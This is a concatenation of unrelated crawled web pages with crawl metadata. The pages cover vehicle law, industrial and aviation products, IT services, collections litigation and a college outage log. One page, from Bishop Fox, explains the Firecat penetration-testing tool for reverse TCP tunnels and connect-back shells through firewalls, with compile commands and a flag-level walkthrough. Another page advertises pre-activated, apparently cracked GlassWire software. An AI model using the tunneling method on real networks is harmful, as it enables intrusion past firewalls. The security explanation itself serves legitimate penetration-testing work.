- warrants to the public that the automated operation of such vehicle is reasonably safe; and
- irrevocably appoints each participating agency as a lawful agent upon whom any process may be served in any action arising from the automated operation of such vehicle.
- The Department of Motor Vehicles may decline, suspend, revoke, or decline to renew the registration of any motor vehicle that it determines to be unsafe, improperly equipped, insufficiently insured, noncompliant with any vehicle registration requirement, or otherwise unfit to be operated on a highway.
- Registration of a motor vehicle shall create no presumption as to the safety of such vehicle or its equipment.
- This Title's vehicle and equipment provisions shall be interpreted to facilitate the development and deployment of automated vehicles in a way that improves highway safety.
- An automated vehicle shall be reasonably safe.
- An automated driving system shall be reasonably safe.
- Any provision of this Title requiring equipment necessary only for the performance of the dynamic driving task by a human driver shall not apply with respect to a dedicated automated vehicle.
Rules of the road
- This Title's rules of the road shall be interpreted to facilitate the development and deployment of automated vehicles in a way that improves highway safety.
- Automated operation of an automated vehicle in accordance with this Act and in a reasonably safe manner is lawful.
- An automated driving provider shall take reasonable steps to ensure reasonable compliance with all provisions of this section while an associated automated vehicle is under automated operation and shall be liable as would a driver or operator in case of noncompliance.
- A motor vehicle shall not be operated on a public highway if it is unsafe, improperly equipped, insufficiently insured, noncompliant with any vehicle registration requirement, or otherwise unfit for such operation.
- An automated vehicle that is under automated operation shall not be deemed unattended unless it is not lawfully registered in this State or another, poses a risk to public safety, or unreasonably obstructs other road users.
- An automated vehicle that is under automated operation shall not be deemed abandoned unless it is not lawfully registered in this State or another, poses a risk to public safety, or unreasonably obstructs other road users.
- Any provision of this Title restricting the use of electronic devices by a driver or operator shall not apply to the automated operation of an automated vehicle.
- Any provision of this Title requiring a minimum following distance other than a reasonable and prudent distance shall not apply to operation of any nonleading vehicle traveling in a procession of vehicles if the speed of each vehicle is automatically coordinated.
- Any natural or legal person who in willful or wanton disregard for the safety of persons or property initiates, continues, or impedes the automated operation of an automated vehicle shall be guilty of reckless driving.
- The automated driving provider shall maintain automated operation insurance for each automated vehicle in an amount that is not less than the amount of third party liability insurance specified in this State's financial responsibility statute.
- The automated driving provider shall maintain an automation continuation guarantee for each automated vehicle in an amount that is not less than $10,000, except that this requirement shall not apply if the automated driving provider is also the automated vehicle owner.
- This Act does not displace any other insurance requirements.
- Unless otherwise provided by this Act or by the laws of this State, a natural or legal person who fails to comply with any provision of this Act shall be liable for a civil infraction and fined not more than $1000 for each day of each violation.
- The effective date of this Act shall be 30 days after its enactment.
- The provisions of this Act are severable, and a declaration that any part thereof is unconstitutional or otherwise invalid shall not affect the part that remains.
systems_science
https://www.mayainstruments.com/en-US/ves/698/706/728/1072/0/0
2023-10-04T18:56:27
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233511406.34/warc/CC-MAIN-20231004184208-20231004214208-00845.warc.gz
0.890336
364
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__73043063
en
The calorimetric SIKA flow monitors of the VE series are used for monitoring volumetric flows. The flow monitor is easily screwed directly into the process line by means of a connection thread. As the measuring probe is available in two different lengths, a wide range of pipelines with various nominal diameters and wall thicknesses is covered. In the compact version VES, the flow sensor and the associated evaluation electronics form one unit. In this way, the flow can be monitored directly at the measuring point.
The calorimetric flow monitor works according to the principle of temperature difference detection. There are two temperature sensors inside the cylindrical measuring probe. They have optimal heat-conducting contact with the medium and at the same time good thermal insulation from each other. One sensor is heated with constant power; the other is not heated and thus assumes the medium temperature. When the medium is stationary, there is a constant temperature difference between the two sensors. The heated sensor is cooled by the flowing medium. The resulting change in the temperature difference between the two sensors depends on the flow velocity and is therefore a parameter for monitoring the preselected minimum flow. This signal is fed to a comparator that controls a transistor output signal. The output signal is set to the desired flow limit value using a potentiometer. If the flow falls below this value, the transistor output signal is activated. A 6-digit LED chain indicates the proximity to the set alarm point.
» No movable parts in the flow
» Setpoint at extremely low flow possible
» High compressive strength
» Applicable with different nominal diameters
» Dry-run protection for pumps
» Monitoring of lubrication circuits
» Cooling and heating circuits
» Leakage monitoring
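The switching behaviour described above can be summarized in a few lines of toy-model code. This is only a rough numerical illustration of the calorimetric principle (larger flow means a smaller temperature difference; the output trips when flow drops below the set limit), not SIKA's characteristic curve; every coefficient here is invented.

```python
# Toy illustration of a calorimetric low-flow switch (all numbers are arbitrary).
def temperature_difference(flow_velocity, dt_still=10.0, cooling_coeff=4.0):
    """Delta-T (K) between heated and unheated sensor; shrinks as flow increases."""
    return dt_still / (1.0 + cooling_coeff * flow_velocity)

def low_flow_output(flow_velocity, dt_threshold):
    """True = output activated: flow is below the set limit, i.e. the measured
    delta-T has risen above the threshold corresponding to the potentiometer setting."""
    return temperature_difference(flow_velocity) > dt_threshold

for v in (0.0, 0.05, 0.2, 1.0):          # flow velocity in m/s (arbitrary values)
    dt = temperature_difference(v)
    print(f"{v:4.2f} m/s  delta-T = {dt:5.2f} K  output = {low_flow_output(v, dt_threshold=4.0)}")
```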
systems_science
https://vtsmedia.com/streaming/
2023-12-07T20:59:39
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100686.78/warc/CC-MAIN-20231207185656-20231207215656-00818.warc.gz
0.859738
265
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__101320876
en
Adaptive Media Delivery The Adaptive Media Delivery is a solution for streaming that provides a viewing experience by adapting the bit rate (bps) to the best quality of the different networks available, whether they are fixed fiber optic networks or other technologies, and 3G, 4G or 5G mobile networks. Our system securely distributes live and on-demand multimedia content based on HTTP / HTTPS / Web protocol, supporting HTTP Live Streaming, HTTP Dynamic Streaming, Microsoft Smooth Streaming, Dynamic Adaptive Streaming over HTTP and Common Media Application Format. Download Delivery is our high performance and reliable solution for distributing content in the form of files on the Internet, optimized for large files (over 100 MB) and is integrated into our worldwide CDN system to provide reliability, scalability and performance. This service offers a predictable, high-quality download experience as you achieve your online distribution goals, all with clear and easy metrics, plus tools to manage the entire download process. Media Services Live You can now reduce the differences between traditional live broadcasts and live stellar broadcasts thanks to our control system. We have designed our platform to coordinate and deliver the same level of broadcast quality on any digital platform, whether it is a digital native broadcast or an analog converted to digital. Multimedia distribution begins at the edge of the Internet.
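As a generic illustration of the idea behind adaptive bitrate delivery (not this provider's actual algorithm), a client typically picks the highest rendition that fits within a safety margin of the throughput it has just measured, so quality tracks whatever the fixed or mobile network can sustain. The ladder values below are made up.

```python
# Generic adaptive-bitrate rendition selection sketch (example ladder, not real data).
LADDER_KBPS = [400, 800, 1600, 3000, 6000]   # available renditions, lowest to highest

def pick_rendition(measured_throughput_kbps: float, safety: float = 0.8) -> int:
    """Return the highest bitrate that fits within a safety margin of measured throughput."""
    budget = measured_throughput_kbps * safety
    usable = [b for b in LADDER_KBPS if b <= budget]
    return max(usable) if usable else min(LADDER_KBPS)

print(pick_rendition(5000))   # -> 3000 (4000 kbps budget, next rung is too high)
print(pick_rendition(900))    # -> 400  (720 kbps budget only fits the lowest rung)
```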
systems_science
https://crack4dl.com/glasswire-elite-incl-patch/
2020-09-18T19:34:22
s3://commoncrawl/crawl-data/CC-MAIN-2020-40/segments/1600400188841.7/warc/CC-MAIN-20200918190514-20200918220514-00246.warc.gz
0.910481
458
CC-MAIN-2020-40
webtext-fineweb__CC-MAIN-2020-40__0__33230535
en
GlassWire Elite Full Version GlassWire Elite is an efficient and very reliable firewall & monitoring software that allows you to manage and monitor Internet traffic. It is wrapped in a pleasant and easy-to-use user interface, which makes it easier to work with GlassWire. The user interface is designed very nicely to get the appropriate layout for the necessary tools. If any of your computer programs connect to any remote host, it will immediately inform you about that. You can also disconnect this software from the Internet if you don’t want it to connect to the Internet. With this application, you can get the amount of traffic that you use in the 5 Minutes interval, daily, weekly, or monthly. It will also let you know about the amount of consumption with a specific schedule. With its powerful firewall, you can block the different applications with a single click. You can also turn on the warning message for any event or limit messages to the ones which are important to you. With this software, you can display the volume of internal network transactions as well. All in all, this software is very handy, and you should use it if you want to know about Internet traffic. - Simple to use interface to view all your past and present network activity on a graph. - Easy to use tool that can see your past and present network activity. - Keeping track of your daily, weekly, or monthly bandwidth usage. - Detects new RDP connections and will let you know any time an RDP connection occurs. - Get alerted when new WiFi hardware appears nearby with your same network name, and also get alerted if your WiFi network suddenly loses its password. - See a list of devices on the network and get alerted when devices join or leave with our new network device list feature. What’s new in v2.2.201 Elite (Released: May 20, 2020) - GlassWire memory and disk usage resource improvements. - DNS resolving is now improved. - VirusTotal analyze is now faster. - Fixed a medium severity issue reported to our HackerOne bug bounty program about a theoretical filesystem data corruption due to the privileges granted to its service. GlassWire Elite v2.2.201 Pre-Activated
systems_science
http://iaealtd.com/tools/mrt-lab/
2019-11-17T02:11:17
s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496668782.15/warc/CC-MAIN-20191117014405-20191117042405-00281.warc.gz
0.923176
453
CC-MAIN-2019-47
webtext-fineweb__CC-MAIN-2019-47__0__148280491
en
MRT Express Professional DR Tool MRT Ultra Ultimate DR Tool Overview MRT ULTRA MRT Ultra is a new design of MRT Lab launched in 2015 with brand new framework. It is the world’s first PCIE2.0 interface data recovery tool. MRT Ultra is dedicated for high quality, high speed and perfect user experience, which can be classified as high-end configuration among MRT tools. Recently MRT Ultra is released to market, software running platform supports 32-bit and 64-bit Windows operating system. Featured by more ports, more advanced technology, less resource occupancy rate of CPU and hardware design of SATA3.0, there are two main power input, 4 power supply output interfaces, 4 SATA3.0 interfaces and 1 IDE interface. At the same time, there is great enhancement in performance of MRT Ultra. Test firmware transmission speed is raised from 2MByte/s to 33MByte/s. Test DE imaging speed raised to 460MByte/s. Theoretical transmission speed is as high as 600MByte/s. This tool is a good choice for user with mass business volume, professional data recovery company and disk repair institution. There are online full version, offline full version, online repair version and offline repair version software. Overview MRT Express Created by the innovators at Mrtlab, MRT Express is a combination of software and hardware that specializes in both HDD repair and data recovery. Comprised of two parts, the hardware aspect has a special MRT SATA controller card equipped with two SATA ports, which allows two HDDs to be repaired simultaneously, as well as some additional accessories. On the software side, MRT Express has 13 specialized utilities for disk repair and data explore on HDDs from various vendors, architectures and families. Through the advanced hardware and software technology, the repair of HDDs, recovery of firmware can be conducted at factory mode where firmware and microcode is accessible and also user data can be retrieved. MRT Express currently supports HDD families of products from various manufacturers including but not limited to Western Digital, Seagate, Hitachi (including the original series and the newer ARM series), Fujitsu, Samsung and Maxtor.
systems_science
https://olivertechnology.com/author/walker-whiteolivertechnology-com/page/2/
2023-12-09T21:20:12
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100972.58/warc/CC-MAIN-20231209202131-20231209232131-00370.warc.gz
0.927085
1,862
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__148990498
en
The Collections Market is currently experiencing the first credit cycle in the CFPB era. In February 2020, according to the St. Louis Federal Reserve, consumers were expected to default on at least 2.3% of outstanding debt, costing creditors over $325B. However, that prediction was PRIOR to the any impact of the pandemic. If the 2008-2009 recession is any indicator, defaults almost doubled. And many feel we are headed that direction. Creditors, law firms and master servicers are looking at what they need to do today—to keep progressing—while preparing for an inevitable influx of debt collection in the near future. Most collections litigation strategies lack the built-in agility needed to manage the changing dynamics of the market, bringing to light clear failure points in the process. Each time creditors hit a failure point, they leak value out of their strategy, directly impacting their bottom line. Want to get a 360° view from a creditor, lawyer and technology experts on conquering these failure points? Watch our on demand webinar with Heidi Staloch, Vice President and Assistant General Counsel at US Bank , Stefani Jackman, Partner at Ballard Spahr and Walker White, CEO of Oliver Technology. In the meantime, here is a brief review of the five failure points and recommended fixes. Failure #1: The Data is Fractured Antiquated data formats and data collection with limited access across the parties. Creditors system of record comes in many forms. While standards exist, many were designed decades ago and they are not flexible enough to handle dynamic environments like we see today. Additionally, due to the number of sources and systems, these processes raise the risk of inaccurate or incomplete information, either for the Creditor deciding if a particular account is suit-worthy, or for the law firm taking action upon it. We have an opportunity to improve in this area and really modernize. The Fix: A modern, holistic Platform 360° view of data across all relevant parties There are three key categories to fixing a fractured data model. - Consolidation: Bring the data together into a litigation master record visible to all parties; don’t just throw it over the fence. - Automation: Use modern technology to automate many of the tasks you perform manually like loading data, transforming data, cleansing data and even redaction of documents that we want to share with various parties. - Accessible: Using proper permissions, having the ability to share the same data with all interested parties, making it more functional for everyone. Failure #2: Operating on Disparate Platforms Inconsistent, ineffective file management impacts cost and risk Historically, there’s a lot of data and systems involved. Files are tossed over the fence to law firms to operate inside local matter management system and codes are sent back and forth. Matter-specific communication is often relegated to separate emails, texts, and phone calls. It’s inefficient. It also creates potential compliance risks for creditors and law firms, as they are updated about changes after the fact. Any time you lack a master record – a single source of truth – you leak value and efficiency from the process. The Fix: Collaboration and execution in a single streamlined platform Management of all activity by all involved parties within the context of the file. 
Here are the critical capabilities needed to move from a disparate system to an agile solution: - Collaboration: Create a single place that holds the litigation master record, accessible to all parties all the time, allowing near real-time interaction. - Orchestration: Effectively automate the many handoffs, approvals, and reviews to accelerate the process and capture a standardize audit of the “who, what and where” of each transfer. - Visibility: End-to-end visibility for creditors of the entire channel. Failure #3: Efficiently Maintaining Rigorous Compliance Maintaining compliance requirements has increased the need for more FTEs, while slowing time to revenue. Keeping up with all the federal, state, local and venue specific laws, rules and procedures is a huge cost to manage. Since the formation of the CFPB, the amount of quality control checks and audit requirements have grown exponentially. And currently, there’s just no easy fix. You either hire more people or you slow down the volume. The Fix: A Platform with Compliance Built-in All federal, state, local and venue specific laws plus all regulatory, creditor and law firm rules and procedures are built into one platform and managed across the channel. With the technology that exists today, there’s absolutely no reason we cannot codify these rules. So, let’s start there: - Codify Compliance: Think about Turbo Tax, which codified the tax laws to make it very simple for someone to file taxes. The same is possible with the laws, rules, and procedures that govern collections. - Simplify Audit: Pairing codified compliance with a single system that allows for a comprehensive audit makes rigorous compliance a breeze because each step and timing is documented, including attorney meaningful involvement. - Customization: Compliance is a framework, but there are many paths to maintain it; law firms must maintain the ability to practice the “art of litigation” while preserving a consistent approach from the creditor to the consumer. Failure #4: Litigation Lacks Economy of Scale Individual law firms maintain their own knowledge base making it difficult for creditors to scale within and across states. Since creditors partner with law firms in each state, essential business logic about how to litigate in a given state is distributed and is not accessible to the creditor. This makes it difficult for creditors to develop a consistent process across the channel to achieve an economy of scale. When a creditor can integrate law firms onto one platform using a consistent litigation process all parties realize an economy of scale. Even more, creditors are provided end-to-end visibility and control of the process. The Fix: A Platform with integrated law firm knowledge Integrate law firm knowledge into a consistent litigation process on a shared platform. Let’s look at three ways to fix this problem: - Standardize: allows creditors to capture all data during pre-placement and then share that data based on the needs of the firm and states. - Consolidate: Bring law firms onto a single operational platform or set of processes. - Visibility: Provide dynamic and comprehensive dashboards for creditors to be able to see how those files are moving and either assist the firms to keep them going, or bounce them to another firm that can move the file faster. Failure #5: Stalled Inventory Stalled files equate to lost revenue. When the percentage of stalled files increases, profitability dwindles. Today, inventory is distributed to individual law firms in batches. 
With limited to no oversight of all files across the channel, inventory can become buried or under-utilized. Each file has many moving parts and inevitably, active files garner the most attention, while higher value files may go unnoticed. The Fix: Automation of Inventory Management Automating inventory is a new solution, in a unique way, to a common problem. Let’s look at three ways to fix this problem: - Actionable views: A consolidated view allows all relevant parties to see which files are active and which are not. By adding actionable and consumable views of inventory, creditors can rely less on people and more on automation to keep files moving. - File Granularity: Workflows should be based on individual files verses pools/batches. A platform should automatically manipulate, test and compare individual matters to determine if the file should be placed and then evaluate multiple variables of data simultaneously to make a data driven decision regarding where to strategically place files. Automatically processing files to the next step is critical to prevent inventory from stalling; yet some files need human interaction, requiring the platform to flag those files and automatically notify the appropriate person that action is needed. - Visibility: Better visualization ensures more inventory will move in a consistent manner to create more value. When a creditor can visualize the value of each file (including the stage each file is in and why files are not advancing) they can proactively address issues like rebalancing load across firms or rebalancing files based on probability of success. Creditors need a comprehensive view of the inventory and an agile platform that can quickly modify the flow of inventory to generate higher value. Think about it. With your business under a microscope of regulators, most creditors are forced to manage their business with caution. While the debt is mounting, the pressure is building. At some point, the storm is going to pass, and the economy will expand. Now is the time to re-tool your collections litigation process into an agile system so you can cost-effectively scale your operation to capture more revenue in a shorter timeframe when the opportunity arises. Learn more with a 360° view from a creditor, lawyer and technology experts on conquering these failures.
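As a purely hypothetical sketch of the per-file decision logic described above, a platform might score each matter against firm licensing, capacity, and historical performance before placing it or flagging it for review. Every field name, rule, and threshold below is invented for illustration; it is not Oliver's implementation.

```python
# Hypothetical per-file placement rule: place, hold, or flag a matter for review.
def placement_decision(matter: dict, firms: list[dict]) -> dict:
    if matter.get("missing_documents"):          # cannot advance automatically
        return {"action": "flag_for_review", "reason": "incomplete file"}
    eligible = [f for f in firms
                if matter["state"] in f["licensed_states"]
                and f["open_files"] < f["capacity"]]
    if not eligible:
        return {"action": "hold", "reason": "no firm capacity in state"}
    best = max(eligible, key=lambda f: f["historic_recovery_rate"])
    return {"action": "place", "firm": best["name"]}
```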
systems_science
https://www.ikausa.com/products/dbi-recirculation-solid-liquid-mixer-powder/
2022-09-29T05:05:33
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00248.warc.gz
0.875484
321
CC-MAIN-2022-40
webtext-fineweb__CC-MAIN-2022-40__0__37993135
en
The high shear mixing and dispersing machine DBI 2000 is suited for batch operations with a recirculating loop and is directly mounted to the vessel bottom. It enables suction, pumping, and self-cleaning under CIP conditions. The dispersing machine DBI 2000 has a patented two-stage design. This allows for it to be mounted onto a production plant in such a manner that the product is transferred through either one or both stages. The first level has a bottom stirrer and a special pump rotor that creates turbulence in the vessel and high circulation capacities, even for highly-viscous products. The second stage of the dispersing machine DBI 2000 is equipped with a rotor-stator system that ensures qualitative homogenizing and tight particle size distribution. The suction of powders or liquids directly into the mixing chamber is possible without an additional vacuum pump. |Max. total flow rate dispersing |Max. total flow rate pumping |max. viscosity final product
systems_science
http://hsysi.com/
2017-04-24T19:10:48
s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917119782.43/warc/CC-MAIN-20170423031159-00635-ip-10-145-167-34.ec2.internal.warc.gz
0.954717
748
CC-MAIN-2017-17
webtext-fineweb__CC-MAIN-2017-17__0__176922305
en
Virtually every business on this planet relies on computers and networks to stay in business. Unfortunately, most of these systems and networks rarely work very well at all. Problems range from the annoying (like a slow PC or minor printing problems) to the catastrophic (server crashes, network failures, virus infections, and lost files). Because most businesses rely so heavily on technology, computer problems are in reality, business problems. Severe enough computer problems can seriously affect your business and drastically impact your bottom line. We specialize in troubleshooting, diagnosing, and fixing any and all computer problems. More importantly, we go further in identifying and preventing many potential problems that may exist in your systems and could cause havoc down the line. We will take an experienced look at how your business uses technology and how this computer power can be levereged and best used to help your business run as efficiently (and profitably) as possible. We have all the computer expertise and experience your business will ever need. Let us handle your technological needs. You are an expert in your business! That is almost certainly the reason that you are in business. The more time you have to devote to your core business, the better it will become. The last thing you need to do is lose any of your very valuable time maintaining and fixing your computer systems. Let our skill and expertise unburden you from the hassle of keeping your systems up and running. We will work closely with you and your employees to make sure your business runs as efficiently as possible. Information Technology represents a substantial and growing investment in most businesses. We will we make sure that you get the most out of the computer and network systems that you currently own. We'll also make sure that any computer equipment you purchase going forward will give you the most bang for your technological buck. If you can dream it, we can build it. From the mundane (software to automatically sort your email) to the esoterically sublime (a remote, computer controlled coffee machine that uses GPS information from your cell phone to determine when you are 15 minutes from your office so it can automatically start making coffee which will be perfect and waiting for you the moment you walk in the door). We can create all that and more. We love to dream up unique and usefull computer systems and solutions almost as much as we love to build them. We can also improve the software and hardware systems you have now by customizing and extending them to better fit your business work flow. In addition we can create brand new, custom software and systems to precisely fill your business needs. We will sit down with you to determine exactly what your needs are and design and build a custom, state of the art computer system to get the job done. Networks keep vital information and communication flowing between the computers in your office and the outside world. Your network as a whole is a very important hardware component of your overall computer system. Like any other high tech piece of equipment, it needs proper maintenance to ensure it runs at optimum speed and with the strongest possible security. When connected to the Internet, your computers and networks are bombarded 24 hours a day by viruses, trojan horses, browser hijackers, phishing attacks, and hackers. It is vitally important to keep your data safe while allowing legitimate electronic traffic to flow in and out. 
We will review your entire network and critical data paths to ensure your data is secured and flowing as efficiently as possible. We will identify and fix any potential failure points, bottlenecks, and security holes you may have. We can also design, build, and install any kind of data, voice, video, and/or audio network you require or desire.
systems_science
https://www.northeastavionics.co.za/post/portable-navigation-with-a-7-screen
2024-03-01T17:14:59
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947475422.71/warc/CC-MAIN-20240301161412-20240301191412-00654.warc.gz
0.901489
859
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__40517471
en
Featuring a modern yet rugged design, the aera 760 is an all-in-one aviation portable complete with a built-in GPS/GLONASS receiver that is optimized for the cockpit. Its bright, 7-inch sunlight readable display can run on battery power for up to four hours on a single charge. Along the bezel, an industry-standard USB-C connection is used to charge and power the aera 760, while a microSD card slot allows pilots to load topography and street maps or use it to easily transfer user waypoints. The aera 760 features an intuitive user-interface resembling that of many other popular Garmin products such as the GTN Xi series,G3X Touch and Garmin Pilot allowing pilots to easily transition between multiple Garmin products in the cockpit. Capable of operating in harsh conditions, the aera 760 has also been tested and hardened to meet stringent temperature and vibration standards. Built-in Wi-Fi and Bluetooth allow the aera 760 to take advantage of Garmin Connext wireless connectivity inside and outside of the cockpit. When connected to Wi-Fi, pilots can easily download aviation database and software updates without the need to physically connect it to a computer. Prior to departure, pilots can also view worldwide weather information on the aera 760 when it’s connected to Wi-Fi. In the cockpit, it is capable of wirelessly connecting to select products such as the GTX 345 or the GDL 52 to display the benefits of Automatic Dependent Surveillance-Broadcast (ADS-B) traffic, Flight Information Service-Broadcast (FIS-B) weather, SiriusXM aviation weather and more via Bluetooth. Exclusive features such as TerminalTraffic and TargetTrend can also be viewed on the moving map and dedicated traffic pages. Pilots can hard-wire the aera 760’s power, audio and dual RS-232 connections to receive additional benefits. When connected to a navigator such as the GTN 650Xi/750Xi, GTN 650/750 or the GNS 430W/530W, the aera 760 can send and receive flight plan data that is entered into the navigator over a serial port so all products remain synchronized throughout the flight. It is also capable of wirelessly connecting to these navigators when paired with a Flight Stream 210/510. When connected to a NAV/COM such as the GTR 225, GNC 255 or GTR 200, frequencies and airport identifiers can also be transferred from the aera 760 to the corresponding NAV/COM. For aircraft flying in visual conditions, pilots can optionally connect the aera 760 to select autopilots to fly lateral GPS and single point vertical navigation (VNAV) guidance. For example, pilots flying in visual conditions can fly a VNAV profile from their current altitude to pattern altitude using the aera 760 fully coupled to the autopilot. 3D Vision technology displays a virtual 3D perspective view of surrounding terrain, obstacles and airports, as well as a horizontal situation indicator (HSI) that is capable of showing lateral and vertical deviation bars. When the aera 760 is panel mounted or paired with a compatible attitude source such as a GDL 52 or GTX 345, pilots can view synthetic vision (SVX), which adds the display of back-up attitude information on the portable. The aera 760 also features fuel price information, an E6B flight computer and weight and balance calculators. The E6B can be used prior to a flight to aid in calculating fuel burn, estimated time of arrival (ETA) and more. While in-flight, the aera 760 utilizes ground speed information to recalculate fuel burn and ETA. 
Helicopter operators also have access to features tailored to their unique operations, such as WireAware wire-strike avoidance technology. WireAware overlays power line locations and relative altitude information on the moving map and provides both aural and visual alerting when operating near power lines. Pilots also have the option to enter street intersections or non-aviation waypoints. GPS altitude display is offered in both mean sea level (MSL) and above ground level (AGL), so they are easier to identify relative to the aircraft flight path.
systems_science
https://resources.bishopfox.com/resources/tools/other-free-tools/firecat/
2024-04-22T13:57:26
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296818293.64/warc/CC-MAIN-20240422113340-20240422143340-00282.warc.gz
0.881432
1,479
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__182371619
en
Firecat is a penetration testing tool that allows you to punch reverse TCP tunnels out of a compromised network. After a tunnel is established, you can connect from an external host to any port on any system inside the compromised network, even if the network is behind a NAT gateway and/or strict firewall. This can be useful for a number of purposes, including gaining Remote Desktop access to the internal network NAT'd IP address (e.g. 192.168.1.10) of a compromised web server. Firecat is written in C and has been tested on Linux, Solaris, iOS, Mac OS X, and Windows XP/Vista/2k/2k3/2k8.
- To compile on Windows using MinGW:
- gcc -o firecat.exe firecat.c -lwsock32
- To compile on Unix:
- gcc -o firecat firecat.c
How does it work?
Flashback a decade or so and you will recall that it was common to find hosts that were not firewalled properly (or at all) from the Internet. You could compromise a host, bind shellcode to a port, and use netcat or some other tool to take interactive command-line control of the target. These days things are different. It is often the case that TCP/IP packets destined for a host are strictly filtered by ingress firewall rules. Often matters are further complicated by the fact that the target host is located behind a NAT gateway: Tight firewall rules reduce the attack surface of the target environment, but attacks such as SQL injection still make it possible to execute arbitrary code on even the most strictly firewalled servers. However, unless the consultant can also take control of the firewall and alter the ruleset, it is impossible to connect directly to internal network services other than those allowed by the firewall. That's where Firecat comes into play.
Assuming you can execute commands on a host in a DMZ and further assuming that the host can initiate outbound TCP/IP connections to the consultant's computer, Firecat makes it possible for the consultant to connect to any port on the target host, and often any port on any host inside the DMZ. It does this by creating a reverse TCP tunnel through the firewall and using the tunnel to broker arbitrary TCP connections between the consultant and hosts in the target environment. In addition to creating arbitrary TCP/IP tunnels into DMZ networks, it can also be used to pop connect-back shells from compromised DMZ hosts such as web or SQL servers. It works because the target system is the one that initiates the TCP connection back to the consultant, not the other way around. Firecat runs in "target" mode on the target, and "consultant" mode on the consultant's system, effectively creating a tunnel between the two endpoints. Once the tunnel is established, the consultant connects to their local Firecat daemon, which instructs the remote Firecat daemon to initiate a connection to the desired host/port behind the firewall. The two Firecat daemons then tunnel the data between the consultant and the target to create a seamless, transparent bridge between the two systems, thus completely bypassing the firewall rules. Firecat even works on hosts behind NAT firewalls.
Broken down into logical steps, the process works as follows:
- Firecat (consultant) listens on port 4444 of the consultant’s internet-facing system
- Firecat (target) connects out to the consultant’s system on port 4444
- A tunnel is established between the two hosts
- Firecat (consultant) listens locally on port 3389
- The consultant connects a remote desktop client to localhost:3389
- Firecat (consultant) tells Firecat (target) that a new session has been started
- Firecat (target) connects to 192.168.0.1:3389
- Firecat (target) tells Firecat (consultant) that it’s now connected locally
- Both Firecat instances begin to tunnel data between the consultant’s remote desktop client and the target’s remote desktop server, making it appear to the remote desktop client that it is directly connected to the target.
Let’s say we want to carry out the tunneling procedure described above and connect to the remote desktop service (TCP port 3389) of our target host, an IIS web server. The firewall allows only port 80/TCP to pass from the internet to the target server. The target server has an internal IP address of 192.168.0.1, NAT’d by the firewall. The target is allowed by the firewall to make outbound connections to port 443/TCP on the internet. Our own system isn’t firewalled and is directly connected to the internet.
First, we start a Firecat daemon on our own system. The “-m 0” flag tells Firecat that we’re running in consultant mode. The “-t 443” flag tells Firecat to listen on port 443 for connections from the compromised target. The “-s 3389” flag tells Firecat to listen on port 3389 for a connection from the consultant; we’ll come to that in a minute. (Example command lines are sketched at the end of this walkthrough.)
We now start a Firecat daemon on the remote system. The “-m 1” flag tells Firecat we’re in target mode, the “-h” flag specifies the IP address of our computer, and “-s 3389” specifies that we’ll be using this tunnel to connect to port 3389 of the compromised web server.
Firecat connects from the target to port 443 of our computer. Our Firecat instance notifies us of the incoming connection (the incoming IP address will be that of the target network’s NAT firewall, not the compromised host itself) and reports that the tunnel has been initialized successfully. At this point, both Firecat instances go to sleep until we start a remote desktop client and connect to localhost:3389. When that happens, the local Firecat informs the remote Firecat, which in turn initiates a connection to the target on port 3389. Data sent from the RDP server is relayed via the Firecat tunnel back to our RDP client, and vice versa. That’s it: we have established a tunnel that allows us to initiate an RDP session with the compromised host behind the NAT firewall. Our local Firecat instance reports the new session, and the target end reports that it has connected locally. The tunnel is established and the two endpoints communicate transparently via Firecat until either the session is closed by the RDP client or server, or one of the Firecat instances is killed.
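The exact command lines are not shown above, so here is a sketch of what the two invocations might look like based on the flags just described (flag order and any additional options should be checked against Firecat’s own usage output; <consultant-ip> is a placeholder for the consultant’s internet-facing address, not a value from the original article):
On the consultant’s system: ./firecat -m 0 -t 443 -s 3389
On the compromised target: ./firecat -m 1 -h <consultant-ip> -s 3389
The target side presumably also needs to be told the tunnel port (for example, a matching -t 443), but that detail is not spelled out in the walkthrough above.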
systems_science
http://colbycollege.statuspage.io/
2018-01-20T00:42:38
s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084888341.28/warc/CC-MAIN-20180120004001-20180120024001-00345.warc.gz
0.946855
254
CC-MAIN-2018-05
webtext-fineweb__CC-MAIN-2018-05__0__164694409
en
All systems are now operational following the power outage earlier this morning. Any issues believed to be related to this incident should be communicated to ITS Support. Jan 13, 07:14 EST We are investigating a possible issue with the security / ccard system. All other systems are reporting as normal. We will continue to provide updates via http://its-status.colby.edu Jan 13, 07:05 EST All campus network services, including wireless, are now operating again. Some online services are restored while others are still in the process of being restored. We will continue to provide updates as these services are restored. Jan 13, 06:26 EST Power has been restored and systems are being powered back up gradually. We anticipate 20-30 minutes for restoration of critical services. Jan 13, 05:49 EST All IT systems are now offline due to the ongoing campus power outage. Campus telephones are still operating with approximately two hours of reserve power remaining. Jan 13, 05:14 EST The campus is currently experiencing a power outage that is affecting most systems and services. We are monitoring the situation and will continue to provide updates via http://its-status.colby.edu Jan 13, 05:04 EST
systems_science
http://www.chillicious.com/business/huawei-to-launch-5g-chips-and-phones-by-june-2019/
2019-02-21T09:47:55
s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550247503844.68/warc/CC-MAIN-20190221091728-20190221113728-00322.warc.gz
0.948004
192
CC-MAIN-2019-09
webtext-fineweb__CC-MAIN-2019-09__0__17574375
en
